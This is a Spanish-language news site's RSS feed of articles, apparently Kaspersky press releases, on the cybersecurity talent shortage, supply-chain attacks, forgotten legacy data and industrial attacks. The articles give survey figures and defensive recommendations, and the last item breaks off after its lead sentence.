<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ataques &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/ataques/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Mon, 20 Apr 2026 15:03:54 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>Falta de talento en ciberseguridad deja a las empresas más expuestas</title>
		<link>https://www.todoenunclick.com/falta-de-talento-en-ciberseguridad-deja-a-las-empresas-mas-expuestas/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Mon, 20 Apr 2026 15:03:48 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[cadena de suministro]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[empresas]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[protección]]></category>
		<category><![CDATA[suministros]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101887</guid>

					<description><![CDATA[<p><img width="1500" height="844" src="https://www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg?resize=284%2C160&amp;ssl=1 284w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg?resize=597%2C336&amp;ssl=1 597w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg?resize=746%2C420&amp;ssl=1 746w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg?resize=640%2C360&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg?resize=681%2C383&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Falta-de-Talento-y-Cadena-de-Suminstro.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p><strong>Estudio de Kaspersky revela que la falta de especialistas limita la capacidad de las organizaciones para enfrentar retos críticos como los ataques a la cadena de suministros.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La escasez de talento en ciberseguridad ya no es un reto a futuro, es un problema urgente para las empresas. En paralelo, los ataques a la cadena de suministro y a las relaciones de confianza se han consolidado como una de las principales amenazas, afectando a una de cada tres organizaciones en el último año, según un estudio global de Kaspersky<sup>1</sup>. En este contexto, la falta de profesionales especializados, sumada a la presión de gestionar múltiples prioridades, está limitando la capacidad de las organizaciones para responder a estos riesgos: el 42% de los encuestados reconoce que estas brechas están frenando sus esfuerzos de protección.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>De acuerdo con la encuesta, uno de los principales obstáculos para reducir los riesgos asociados a la cadena de suministro y las relaciones de confianza es la falta de personal calificado. Esta escasez limita la capacidad de las organizaciones para acceder de manera constante y monitorear posibles vulnerabilidades en terceros dentro de sus ecosistemas. La necesidad de profesionales en ciberseguridad capaces de enfrentar estos riesgos es especialmente alta algunos países de América Latina, como México, y en Vietnam, Emiratos Árabes Unidos y España.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Entre otros obstáculos principales, los encuestados señalaron la necesidad de atender múltiples prioridades de ciberseguridad al mismo tiempo. Esto refleja que los equipos de seguridad están sobrecargados con demasiadas tareas a la vez, lo que puede dejar sin atender las amenazas relacionadas con la cadena de suministro.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Más allá de la falta de recursos, las empresas también enfrentan problemas estructurales. El 39% de los encuestados afirma que sus contratos no incluyen obligaciones claras de seguridad informática para los contratistas, una brecha especialmente frecuente en países como Vietnam, Turquía, España y México. A esto se suma que el 32% señala que el personal fuera del área de seguridad no comprende plenamente estos riesgos, lo que dificulta su gestión dentro de las organizaciones.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":101888,"sizeSlug":"large","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-large"><img src="https://www.todoenunclick.com/wp-content/uploads/2026/04/image-2-642x305.gif" alt="" class="wp-image-101888" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph {"align":"center"} -->
<p class="has-text-align-center"><em>Principales barreras para gestionar riesgos en la cadena de suministro: falta de talento (42%), prioridades operativas (42%) y debilidades contractuales (39%).</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>A nivel global, el 85% de las empresas reconoce que necesita reforzar su protección frente a los riesgos en la cadena de suministro y en sus relaciones con terceros, mientras que solo el 15% considera que sus medidas actuales son realmente efectivas. Este nivel de confianza es aún menor en países como Alemania (6%), Turquía (7%), Italia (8%), Brasil (8%), Rusia (8%) y Arabia Saudita (9%).</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Al mismo tiempo, las acciones que están tomando las empresas para protegerse siguen siendo limitadas y poco consistentes: ninguna medida supera el 40% de adopción, y la más común, la autenticación en dos pasos, solo es utilizada por el 38% de los encuestados.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Además, solo el 35% de las organizaciones revisa de forma periódica la seguridad de sus proveedores. Esto significa que cerca de dos tercios de las empresas no tienen visibilidad constante sobre los riesgos que pueden venir de sus socios, lo que las deja expuestas a nuevas vulnerabilidades.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Sin embargo, las empresas que ya han sufrido este tipo de ataques tienden a fortalecer sus prácticas. Por ejemplo, el 56% de las que han sido afectadas por incidentes en la cadena de suministro solicita pruebas de seguridad más rigurosas, mientras que quienes han enfrentado brechas en relaciones de confianza priorizan la verificación de estándares (56%) y el cumplimiento de políticas de seguridad por parte de sus contratistas (53%).</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Desde una perspectiva regional, el problema no es solo la escasez de talento, sino el impacto directo que esto tiene en la capacidad de las empresas para gestionar riesgos de forma integral. Cuando los equipos están sobrecargados, la seguridad deja de ser preventiva y se vuelve reactiva, abriendo la puerta a amenazas que pueden ingresar a través de proveedores y escalar sin ser detectadas. En América Latina, donde los ecosistemas empresariales son cada vez más interconectados, una debilidad en un tercero puede convertirse rápidamente en un riesgo operativo, financiero y reputacional para toda la organización. Por eso, la seguridad de la cadena de suministro debe abordarse como una responsabilidad compartida, con estándares claros y consistentes en toda la red. Además, los ciberdelincuentes saben que la escasez de talento es aún más marcada en las organizaciones más pequeñas de la cadena de suministro, lo que las convierte en objetivos prioritarios”</em>, <strong>afirma Claudio Martinelli, Director General para Américas en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para mitigar estos riesgos, los expertos de Kaspersky recomiendan:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Adopte servicios de seguridad gestionada.</strong> Para las organizaciones que carecen de recursos dedicados a ciberseguridad, la mejor opción es recurrir a la externalización. Utilice servicios como <a href="https://latam.kaspersky.com/enterprise-security/managed-detection-and-response">Kaspersky Managed Detection and Response (MDR)</a> y/o <a href="https://latam.kaspersky.com/enterprise-security/incident-response">Incident Response</a>, que cubren todo el ciclo de gestión de incidentes, desde la identificación de amenazas hasta la protección continua y la remediación.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Invierta en formación adicional en ciberseguridad.</strong> Refuerce los conocimientos de ciberseguridad de sus colaboradores mediante <a href="https://asap.kaspersky.com/es">programas de capacitación de Kaspersky</a>, ya sea en modalidad autodidacta o en vivo, con un enfoque práctico. Estos programas educativos ayudan a los profesionales de seguridad a desarrollar sus habilidades técnicas y a proteger a las empresas frente a ataques sofisticados.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Evalúe exhaustivamente a los proveedores antes de establecer un acuerdo.</strong> Revise sus políticas de ciberseguridad, información sobre incidentes previos y el cumplimiento de estándares de seguridad de la industria. En el caso de software y servicios en la nube, también se recomienda analizar datos de vulnerabilidades y resultados de pruebas de penetración.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Implemente requisitos de seguridad en los contratos.</strong> Los acuerdos con proveedores deben incluir disposiciones específicas de seguridad de la información, como auditorías periódicas, cumplimiento de las políticas de seguridad de la organización y protocolos de notificación de incidentes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Colabore con los proveedores en temas de seguridad.</strong> Refuerce la protección en ambas partes y conviértala en una prioridad compartida</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/falta-de-talento-en-ciberseguridad-deja-a-las-empresas-mas-expuestas/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101887</post-id>	</item>
		<item>
		<title>Se disparan los Ciberataques a Cadenas de Suministro</title>
		<link>https://www.todoenunclick.com/se-disparan-los-ciberataques-a-cadenas-de-suministro/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 14:10:58 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[Cadenas de suministro]]></category>
		<category><![CDATA[ciberataques]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101782</guid>

					<description><![CDATA[<p><img width="1500" height="1001" src="https://www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg?resize=681%2C454&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/03/Cadenas-de-Suministro_Kaspersky.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p><strong><em>Un estudio de Kaspersky</em></strong> revela que la creciente dependencia de proveedores está ampliando la superficie de ataque en América Latina</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los ataques a la cadena de suministro se están consolidando como una de las principales ciberamenazas para las empresas en América Latina, en un contexto donde la creciente dependencia de proveedores y terceros amplía la superficie de ataque. A nivel global, <a href="https://lp.kaspersky.com/global/report-supply-chain-reaction/">un estudio de Kaspersky</a> revela que el 31% de las empresas sufrió este tipo de incidente en el último año, cifra que asciende a 36% en grandes corporaciones, lo que los posiciona como la amenaza más frecuente. En la región, esta exposición es incluso mayor en mercados como México (43%), y países como Brasil (36%) y Colombia (36%) ya los ubican entre los riesgos de ciberseguridad más peligrosos para sus organizaciones.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según datos recientes del <a href="https://www.weforum.org/publications/global-cybersecurity-outlook-2026/">Foro Económico Mundial</a>, el 65% de las grandes empresas identifica las vulnerabilidades en proveedores y cadenas de suministro como el principal obstáculo para lograr resiliencia en ciberseguridad. Este riesgo se ve amplificado por el alto nivel de interconexión: las organizaciones más grandes trabajan en promedio con cerca de 100 proveedores y pueden superar los 130 terceros con acceso a sus sistemas, frente a unos 50 en empresas más pequeñas. Esta complejidad no solo incrementa la superficie de ataque, sino que facilita amenazas como los ataques a relaciones de confianza, en los que los ciberdelincuentes aprovechan accesos legítimos entre organizaciones para infiltrarse.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Durante el último año, según Kaspersky, los ataques que aprovechan las relaciones de confianza se ubicaron entre las cinco amenazas más comunes, afectando a una cuarta parte (25%) de las empresas a nivel global. Este tipo de ataques, que abusan de conexiones existentes entre organizaciones, se registraron con mayor frecuencia en Turquía (35%), Singapur (33%) y México (31%).</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":101783,"sizeSlug":"full","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2026/03/image-3.gif" alt="" class="wp-image-101783" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Aunque los ataques a la cadena de suministro y a relaciones de confianza se encuentran entre las amenazas más frecuentes, muchas organizaciones aún los subestiman. Al evaluar los riesgos, los líderes empresariales tienden a priorizar amenazas más sofisticadas, como ransomware o ataques persistentes avanzados (APT), dejando en segundo plano aquellas que enfrentan con mayor regularidad.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta desconexión es evidente: solo el 9% de las empresas a nivel global identifica los ataques a la cadena de suministro como su principal preocupación, y apenas el 8% menciona los ataques a relaciones de confianza. Esto ocurre a pesar de que una gran parte de las organizaciones reconoce que este tipo de incidentes puede afectar directamente sus operaciones, lo que evidencia una brecha entre la percepción del riesgo y su impacto real.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El problema es que estos ataques no solo comprometen sistemas, sino que pueden generar interrupciones operativas, afectar la continuidad del negocio y provocar pérdidas económicas significativas. Al aprovechar accesos legítimos a través de proveedores o socios, los ciberdelincuentes pueden moverse dentro de la organización sin ser detectados, amplificando el impacto del incidente y dificultando su contención. En un entorno altamente interconectado, esto convierte a la cadena de suministro en un punto crítico cuya vulnerabilidad puede escalar rápidamente a toda la operación.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Vivimos en la era de la hiperconectividad: operamos un ecosistema digital donde cada conexión, cada proveedor y cada integración se convierten en parte de nuestro perfil de seguridad”</em>, comenta <strong>Claudio Martinelli, Director General para Américas en Kaspersky.</strong><em> “A medida que las organizaciones se vuelven más interconectadas, también crece su exposición a ataques. En este contexto, proteger a la empresa moderna exige un enfoque que abarque todo el ecosistema, fortaleciendo no solo los sistemas individuales, sino también toda la red de relaciones que mantiene en funcionamiento a los negocios”.</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Solo mediante la implementación de medidas preventivas en toda la organización y un enfoque estratégico hacia las relaciones con proveedores y contratistas, las empresas pueden reducir los riesgos en la cadena de suministro y garantizar la resiliencia de su negocio.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para mitigar estos riesgos, Kaspersky recomienda lo siguiente:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Evaluar exhaustivamente a los proveedores antes de establecer una relación comercial:</strong> revisar sus políticas de ciberseguridad, información sobre incidentes pasados y cumplimiento con estándares de seguridad de la industria. En el caso de software y servicios en la nube, también se recomienda analizar datos sobre vulnerabilidades y pruebas de penetración.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Implementar requisitos de seguridad en los contratos: </strong>realizar auditorías de seguridad periódicas y garantizar el cumplimiento de las políticas de seguridad de la organización y los protocolos de notificación de incidentes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Adoptar medidas tecnológicas preventivas: </strong>aplicar prácticas de seguridad como el <a href="https://www.kaspersky.com/blog/what-is-the-principle-of-least-privilege/50232/">principio de mínimos privilegios</a>, el modelo <a href="https://latam.kaspersky.com/blog/zero-trust-security/19747/">Zero Trust</a> y una <a href="https://www.kaspersky.com/blog/how-to-benefit-from-identity-security/48399/">gestión madura de identidades</a> para reducir el impacto en caso de que un proveedor sea comprometido.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Asegurar monitoreo continuo: </strong>utilizar soluciones como <a href="https://latam.kaspersky.com/next-xdr-optimum">XDR</a> o <a href="https://www.kaspersky.com/next-mxdr-optimum">MXDR</a>, parte de la línea de productos <a href="https://latam.kaspersky.com/next">Kaspersky Next</a>, para monitorear la infraestructura en tiempo real y detectar anomalías en software y tráfico de red, dependiendo de la disponibilidad de personal interno especializado para llevar a cabo este monitoreo.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Desarrollar un plan de respuesta a incidentes: </strong>asegurarse de que incluya escenarios relacionados con ataques a la cadena de suministro y contemple pasos para identificar y contener rápidamente una brecha, por ejemplo, desconectando al proveedor de los sistemas de la empresa.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Colaborar con los proveedores en temas de seguridad:</strong> fortalecer la protección en ambos lados y convertir la seguridad en una prioridad compartida.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Más recomendaciones y otros hallazgos interesantes sobre la exposición de las empresas a ataques en la cadena de suministro están disponibles en el <a href="https://lp.kaspersky.com/global/report-supply-chain-reaction/">informe completo</a>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>[1] Para la elaboración del informe, el centro interno de investigación de mercado de Kaspersky encargó una encuesta en la que se consultó a <strong>1,714 expertos técnicos</strong>, desde directivos de nivel <strong>C-level</strong> y vicepresidentes hasta líderes de equipo y especialistas senior de empresas con más de <strong>500 empleados</strong>. El estudio abarcó <strong>16 países</strong>, entre ellos Alemania, España, Italia, Brasil, México, Colombia, Singapur, Vietnam, China, India, Indonesia, Arabia Saudita, Turquía, Egipto, Emiratos Árabes Unidos y Rusia.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>[2] Empresa baja (low enterprise): <strong>500–1,499 empleados</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>[3] Empresa mediana (mid-size enterprise): <strong>1,500–2,499 empleados</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>[4] Empresa grande (high enterprise): <strong>2,500 o más empleados</strong></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/se-disparan-los-ciberataques-a-cadenas-de-suministro/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101782</post-id>	</item>
		<item>
		<title>Datos olvidados pueden convertirse en puerta de entrada para ataques</title>
		<link>https://www.todoenunclick.com/datos-olvidados-pueden-convertirse-en-puerta-de-entrada-para-ataques/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Tue, 10 Feb 2026 15:49:46 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[cuentas inactivas]]></category>
		<category><![CDATA[datos olvidados]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[servidores heredados]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101627</guid>

					<description><![CDATA[<p><img width="1500" height="1000" src="https://www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg?resize=681%2C454&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Datos-Olvidados_Kaspersky.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p><strong>Servidores heredados, cuentas inactivas y repositorios abandonados amplían la superficie de ataque y exponen a las empresas a riesgos cibernéticos y regulatorios. Kaspersky comparte recomendaciones para mitigar estas amenazas.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Sin notarlo, las empresas han ido acumulando datos olvidados dentro de su infraestructura que representan un riesgo creciente. Servidores heredados, cuentas inactivas y repositorios en la nube abandonados pueden convertirse en puertas de entrada para ataques sofisticados, advierte Kaspersky. Además de comprometer información sensible e incluso el cumplimiento de las leyes de protección de datos personales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Si bien han dejado de utilizarse en las operaciones diarias, estos activos permanecen conectados a la infraestructura corporativa, en muchos casos sin actualizaciones, monitoreo ni controles de acceso adecuados. Esta “infraestructura invisible” se ha convertido en un reto significativo para los equipos de TI y de seguridad de la información.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El software heredado y las aplicaciones antiguas suelen mantener dependencias desactualizadas, lo que deja vulnerabilidades críticas sin corregir durante años. De igual forma, los servidores físicos y virtuales “olvidados” después de migraciones, fusiones, adquisiciones o la conclusión de proyectos de TI representan riesgos adicionales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según datos de Let’s Encrypt, organización dedicada a la certificación digital, en 2024, cerca del 50% de las solicitudes de renovación provinieron de dispositivos que ya no estaban vinculados a los dominios correspondientes, lo que contribuye a un universo estimado de aproximadamente un millón de dispositivos olvidados que aún permanecen conectados a la red global.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Cuando los activos dejan de ser visibles para los equipos de seguridad y TI, comienzan a operar fuera de los modelos de gobernanza de la organización. Además de aumentar los riesgos cibernéticos, estos elementos consumen recursos técnicos y financieros que podrían destinarse a iniciativas estratégicas, impactando directamente en la eficiencia, el cumplimiento y la planificación a largo plazo”</em>, afirma <strong>Claudio Martinelli, director general para las Américas en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Automatización e higiene digital son prioridades</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Datos del <strong>CISO Survey</strong>, una encuesta de Kaspersky aplicada a 300 líderes de ciberseguridad en países de América Latina, incluidos Argentina, Brasil, Chile, Colombia, México y Perú, refuerzan cómo la falta de madurez en los entornos de seguridad expone a las organizaciones a riesgos asociados con infraestructuras olvidadas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La ausencia de evaluaciones periódicas de riesgo y la adopción de una postura predominantemente reactiva dificultan la identificación de activos desatendidos, que permanecen conectados sin controles adecuados. Entre los participantes del estudio <strong>en la región</strong>, el 56% afirmó no contar con un calendario regular de evaluaciones de riesgo, revisando los controles únicamente después de incidentes o de noticias en los medios. <strong><em>Así mismo lo afirmó el 62% de argentinos, 48% de brasileros, 56% de chilenos y peruanos, 46% de colombianos y el 66% de mexicanos.</em></strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La dependencia de procesos manuales es otro desafío <strong>en la región</strong>: el 53% de los equipos de seguridad encuestados compila inteligencia de amenazas de forma manual, un método lento y propenso a errores que dificulta el seguimiento de activos antiguos en redes complejas. Así lo admitió <strong><em>el 52% de argentinos, 54% de brasileros, colombianos y mexicanos, el 50% de chilenos y el 56% de peruanos.</em></strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para garantizar una protección de datos más efectiva en 2026, Kaspersky recomienda que las empresas abandonen el enfoque reactivo y avancen hacia un modelo proactivo de resiliencia digital. Los Procesos automatizados de Descubrimiento y Reconciliación de Activos (AD&amp;R), por ejemplo, permiten identificar sistemas en conflicto, accesos indebidos e información desactualizada antes de que se conviertan en objetivos de ataque.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>También es fundamental establecer políticas formales para la descontinuación de servidores y aplicaciones, incluyendo la destrucción comprobada de los datos antes del apagado del hardware. Además, la integración de soluciones de Gestión de Identidad y Acceso (IAM) con los procesos de recursos humanos resulta clave para permitir la revocación inmediata de las cuentas de empleados desvinculados o proveedores de servicios, reduciendo así la superficie de ataque.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para obtener más información, visita la página de Kaspersky y descarga el informe de la encuesta <a href="https://lp.kaspersky.com/latam/ciso/">CISO 2025</a>.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/datos-olvidados-pueden-convertirse-en-puerta-de-entrada-para-ataques/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101627</post-id>	</item>
		<item>
		<title>Ciberseguridad industrial: Ataques más Rápidos, más Inteligentes y más Inevitables</title>
		<link>https://www.todoenunclick.com/ciberseguridad-industrial-ataques-mas-rapidos-mas-inteligentes-e-inevitables/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Thu, 22 Jan 2026 15:18:27 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[ciberseguridad industrial]]></category>
		<category><![CDATA[energìa]]></category>
		<category><![CDATA[infraestructura crítica]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[Manufactura]]></category>
		<category><![CDATA[sistemas industriales]]></category>
		<category><![CDATA[trasnporte]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101574</guid>

					<description><![CDATA[<p><img width="1500" height="844" src="https://www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg?resize=284%2C160&amp;ssl=1 284w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg?resize=597%2C336&amp;ssl=1 597w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg?resize=746%2C420&amp;ssl=1 746w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg?resize=640%2C360&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg?resize=681%2C383&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/01/Ciberseguridad-Industrial-2026.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p><strong>Kaspersky alerta sobre la expansión de los ataques a infraestructuras industriales críticas.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
